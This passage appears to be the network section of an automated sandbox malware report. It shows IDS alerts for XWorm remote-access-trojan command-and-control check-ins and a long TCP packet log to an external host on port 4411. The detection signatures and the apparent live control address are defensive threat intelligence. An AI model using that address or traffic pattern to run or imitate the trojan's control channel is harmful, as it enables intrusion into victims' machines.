                                      2024-12-18T08:17:07.430548+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:17:07.529526+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:17:07.550481+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:17:07.798850+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:17:07.804066+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:17:19.369699+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:17:19.371972+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:17:28.636169+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:17:28.826358+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:17:28.828701+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:17:30.009802+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:17:30.200715+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:17:30.202778+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:17:30.366726+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:17:30.371295+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:17:30.392547+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:17:30.491088+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:17:30.683445+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:17:30.778035+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:17:38.088186+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:17:38.091676+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:17:41.526413+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:17:41.528389+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:17:45.623108+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:17:45.634389+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:17:57.260857+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:17:57.263162+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:17:58.430043+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:18:08.930832+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:18:08.932951+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:18:12.401150+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:18:12.403176+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:18:12.591925+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:18:12.594444+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:18:12.713869+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:18:12.715630+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:18:15.259849+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:18:15.262040+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:18:18.994275+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:18:18.999823+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:18:22.639364+01002858799ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:18:23.072270+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:18:23.074203+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:18:28.444810+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:18:34.833814+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:18:34.838093+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:18:36.479150+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:18:36.481824+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:18:37.871432+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:18:37.874173+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:18:45.510717+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:18:45.514127+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:18:57.135572+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:18:57.141141+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:18:58.456985+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:19:08.793859+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:19:08.800193+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:19:17.112172+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:19:17.253400+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:19:21.167141+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:19:21.168994+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP
                                      2024-12-18T08:19:28.446368+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:19:30.432749+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.949705TCP
                                      2024-12-18T08:19:30.433858+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94970592.255.57.1554411TCP

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Dec 18, 2024 08:15:32.074886084 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:15:32.194696903 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:15:32.194782019 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:15:32.320987940 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:15:32.440628052 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:15:43.947086096 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:15:44.066736937 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:15:44.383553028 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:15:44.423183918 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:15:44.542860985 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:15:55.560941935 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:15:55.680402040 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:15:55.993777990 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:15:55.995603085 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:15:56.115129948 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:15:58.442744017 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:15:58.498080969 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:16:07.186110020 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:16:07.305715084 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:16:07.619210005 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:16:07.622697115 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:16:07.742328882 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:16:18.811115026 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:16:18.930670977 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:16:19.244265079 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:16:19.246948004 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:16:19.366472006 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:16:28.596947908 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:16:28.638796091 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:16:30.435878992 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:16:30.556533098 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:16:30.869806051 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:16:30.871893883 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:16:30.991879940 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:16:35.108000040 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:16:35.227524996 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:16:35.342138052 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:16:35.461611032 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:16:35.467082024 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:16:35.540658951 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:16:35.586577892 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:16:35.586657047 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:16:35.706140041 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:16:35.775609016 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:16:35.777466059 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:16:35.897037029 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:16:35.966382027 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:16:35.971329927 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:16:36.091773033 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:16:36.842448950 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:16:36.962307930 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:16:37.275818110 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:16:37.278095007 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:16:37.398591042 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:16:46.592221975 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:16:46.711651087 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:16:47.024808884 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:16:47.027278900 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:16:47.146789074 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:16:51.248492002 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:16:51.367975950 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:16:51.368040085 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:16:51.487651110 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:16:51.681720972 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:16:51.687516928 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:16:51.807106018 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:16:51.872600079 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:16:51.874948978 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:16:51.994409084 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:16:55.342319012 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:16:55.462127924 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:16:55.860763073 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:16:55.863013029 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:16:55.982563019 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:16:58.870116949 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:16:58.920070887 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:17:01.797969103 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:17:01.917500973 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:02.360637903 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:02.363893986 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:17:02.483362913 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:06.905189991 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:17:07.024748087 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:07.061321020 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:17:07.180794001 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:07.310982943 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:17:07.338323116 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:07.420186043 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:17:07.430474043 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:07.430547953 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:17:07.529525995 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:07.550050020 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:07.550481081 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:17:07.669923067 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:07.798850060 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:07.804065943 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:17:07.923572063 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:18.936070919 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:17:19.055669069 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:19.369699001 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:19.371972084 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:17:19.491430044 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:28.217447996 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:17:28.337037086 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:28.636168957 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:28.732680082 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:17:28.826358080 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:28.828701019 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:17:28.948163986 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:29.577013969 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:17:29.696588993 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:29.696682930 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:17:29.816255093 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:29.816319942 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:17:29.935825109 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:29.936018944 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:17:30.009802103 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:30.055666924 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:30.055763960 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:17:30.175245047 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:30.200715065 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:30.202778101 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:17:30.364953041 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:30.366725922 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:30.371294975 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:17:30.392546892 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:30.435787916 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:17:30.491019964 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:30.491087914 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:17:30.513469934 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:30.625941992 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:17:30.654201031 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:30.654294014 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:17:30.683444977 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:30.733963013 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:17:30.774940968 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:30.778034925 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:17:30.897488117 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:37.654983044 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:17:37.774736881 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:38.088186026 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:38.091675997 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:17:38.211743116 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:41.092479944 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:17:41.213987112 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:41.526412964 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:41.528388977 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:17:41.648174047 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:45.186322927 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:17:45.305859089 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:45.623107910 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:45.634388924 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:17:45.753911018 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:56.811279058 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:17:56.930881023 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:57.260857105 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:57.263161898 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:17:57.382745028 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:58.430042982 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:17:58.486021042 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:18:08.498043060 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:18:08.617779970 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:18:08.930831909 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:18:08.932950974 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:18:09.054086924 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:18:11.967648029 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:18:12.087337017 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:18:12.092647076 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:18:12.212897062 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:18:12.212971926 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:18:12.332662106 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:18:12.401149988 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:18:12.403176069 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:18:12.522975922 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:18:12.591924906 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:18:12.594444036 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:18:12.713869095 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:18:12.713896990 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:18:12.715630054 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:18:12.835268974 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:18:14.826867104 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:18:14.946554899 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:18:15.259849072 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:18:15.262039900 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:18:15.381664991 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:18:18.561378002 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:18:18.681472063 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:18:18.994275093 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:18:18.999823093 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:18:19.119590044 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:18:22.639364004 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:18:22.758862972 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:18:23.072269917 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:18:23.074203014 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:18:23.193919897 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:18:28.444809914 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:18:28.498595953 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:18:34.264504910 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:18:34.384186983 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:18:34.833813906 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:18:34.838093042 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:18:34.957735062 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:18:36.045969009 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:18:36.165821075 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:18:36.479150057 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:18:36.481823921 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:18:36.601546049 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:18:37.438093901 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:18:37.558013916 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:18:37.871432066 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:18:37.874172926 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:18:37.995177031 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:18:45.077061892 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:18:45.196974039 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:18:45.510716915 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:18:45.514127016 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:18:45.634282112 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:18:56.702001095 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:18:56.821883917 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:18:57.135571957 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:18:57.141140938 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:18:57.261709929 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:18:58.456984997 CET44114970592.255.57.155192.168.2.9
                                      Dec 18, 2024 08:18:58.545453072 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:19:08.360177040 CET497054411192.168.2.992.255.57.155
                                      Dec 18, 2024 08:19:08.479876041 CET44114970592.255.57.155192.168.2.9
